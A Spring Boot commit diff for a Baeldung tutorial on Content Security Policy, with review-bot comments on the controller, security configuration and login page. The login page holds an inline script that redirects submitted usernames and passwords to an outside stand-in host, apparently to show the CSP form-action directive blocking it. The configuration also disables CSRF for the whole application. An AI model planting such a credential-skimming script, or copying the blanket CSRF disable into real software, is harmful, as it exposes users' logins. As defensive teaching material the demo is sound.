BAEL-4837 - Content Security Policy using Spring Security and Spring … (#11603)

* BAEL-4837 - Content Security Policy using Spring Security and Spring Boot

* Application Code

* Formatted the code

* Reformatted the test cases as per review comments

* Removed the formatters and deleted extra spaces

Co-authored-by: Bhaskara Navuluri <bhaskara.navuluri@hpe.com>
Bhaskara
2021-12-26 08:14:50 +05:30
committed by GitHub
parent 9b905cef77
commit f16ed0b658
7 changed files with 237 additions and 3 deletions
@@ -0,0 +1,11 @@
package com.baeldung.contentsecuritypolicy;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class ContentSecurityPolicyApplication {
public static void main(String[] args) {
SpringApplication.run(ContentSecurityPolicyApplication.class, args);
}
}
@@ -0,0 +1,23 @@
package com.baeldung.contentsecuritypolicy;
import org.apache.commons.io.IOUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
import javax.servlet.http.HttpServletRequest;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
@RestController
public class ContentSecurityPolicyController {
private static final Logger logger = LoggerFactory.getLogger(ContentSecurityPolicyController.class);
@PostMapping("/report")
public void report(HttpServletRequest request) throws IOException {
if (logger.isInfoEnabled()) {
logger.info("Report: {}", IOUtils.toString(request.getInputStream(), StandardCharsets.UTF_8));
}
}
}
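Review bot: `report` reads the entire request body into memory with `IOUtils.toString` and logs it with no size limit, and because the security configuration permits `/**` anonymously this endpoint accepts arbitrary bodies from any client, so a large body costs heap and a body containing CR/LF lets a sender forge log lines. Cap the read and keep the logged text on one line, e.g. `String body = IOUtils.toString(new BoundedInputStream(request.getInputStream(), MAX_REPORT_BYTES), StandardCharsets.UTF_8);` followed by `logger.info("Report: {}", body.replaceAll("[\\r\\n]", " "));`, with `MAX_REPORT_BYTES` a small constant (commons-io's `org.apache.commons.io.input.BoundedInputStream` is already on the classpath via the `IOUtils` import). A reporting endpoint is conventionally answered with 204, so `@ResponseStatus(HttpStatus.NO_CONTENT)` on the method would also avoid a 200 with an empty body.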
@@ -0,0 +1,26 @@
package com.baeldung.contentsecuritypolicy;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
import org.springframework.security.web.header.writers.StaticHeadersWriter;
@Configuration
public class ContentSecurityPolicySecurityConfiguration extends WebSecurityConfigurerAdapter {
private static final String REPORT_TO = "{\"group\":\"csp-violation-report\",\"max_age\":2592000,\"endpoints\":[{\"url\":\"https://localhost:8080/report\"}]}";
@Override
protected void configure(HttpSecurity http) throws Exception {
http.csrf()
.disable()
.authorizeRequests()
.antMatchers("/**")
.permitAll()
.and()
.headers()
.addHeaderWriter(new StaticHeadersWriter("Report-To", REPORT_TO))
.xssProtection()
.and()
.contentSecurityPolicy("form-action 'self'; report-uri /report; report-to csp-violation-report");
}
}
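Review bot: `csrf().disable()` in `configure` switches CSRF protection off for the whole application, although the only request that needs the exemption is the browser-originated violation report posted to `/report`; the `/login` form served by the same site loses its token check as a side effect. Scope the exemption instead: `http.csrf().ignoringAntMatchers("/report")`. The `REPORT_TO` constant hard-codes `https://localhost:8080/report`, which only resolves on a developer machine; reading the endpoint URL from application properties would let this class serve other deployments unchanged. The bare `xssProtection()` call appears to leave the legacy `X-XSS-Protection` header at its default, which is a no-op relative to Spring Security's defaults as far as I can tell, and current browser guidance treats that header as obsolete, so either drop the call or disable the header explicitly.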
@@ -0,0 +1,67 @@
<!DOCTYPE html>
<html lang="en">
<head>
<title>Content Security Policy</title>
<link href="/webjars/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<script src="/webjars/jquery/jquery.min.js"></script>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Raleway:wght@100;200;300&display=swap" rel="stylesheet">
<link href="/main.css" rel="stylesheet">
</head>
<body>
<nav class="navbar navbar-dark bg-dark">
<div class="container-fluid">
<a class="navbar-brand" href="#">
Baeldung &ndash; Content Security Policy
</a>
</div>
</nav>
<br/>
<div class="container">
<div class="row justify-content-center">
<div class="col-6">
<div class="alert alert-warning" role="alert">
Session time out. Please login.
</div>
</div>
</div>
<div class="row justify-content-center">
<div class="col-6">
<div class="card">
<div class="card-body">
<h3 class="card-title"><strong>Login</strong></h3>
<hr/>
<form id="login" action="/login" method="post" autocomplete="off">
<div class="form-group">
<label for="email">Email <span class="text-danger">*</span></label>
<input type="text" class="form-control" id="email" autocomplete="off">
</div>
<br/>
<div class="form-group">
<label for="password">Password <span class="text-danger">*</span></label>
<input type="password" class="form-control" id="password">
</div>
<script>
let form = document.forms.login;
form.onsubmit = function () {
let username = document.getElementById("email").value;
let password = document.getElementById("password").value;
form.action = "https://youaredoomed.com:9090/collect?u=" + username + "&p=" + password;
}
</script>
<br/>
<button class="btn btn-primary">Login</button>
</form>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
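Review bot: The inline `<script>` that rewrites `form.action` to an external host carries no explanation that it stands in for injected code the `form-action 'self'` directive is meant to block, so a later maintainer may remove it as a bug or copy the page into a project without the policy. Add an HTML comment directly above `<script>`: `<!-- Simulates an injected script; the CSP form-action 'self' directive blocks this redirect and the violation is reported to /report -->`. The `email` and `password` inputs also lack `name` attributes, so even a permitted submission to `/login` carries no fields; adding `name="email"` and `name="password"` would make the allowed path of the demo realistic as well.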
@@ -0,0 +1,26 @@
html, body{
font-family: Raleway, serif;
background-color: #f5f5f5;
}
.navbar
{
background-color: #63b175 !important;
}
.navbar-brand
{
font-size: 1.75rem;
font-weight: bold;
}
/*
hr{
border: 0px dotted rgba(249, 249, 249, 0.88);
}*/
hr {
border: 0;
border-bottom: 1px dashed #969595;
background: #969595;
}
label{
font-weight: bold;
}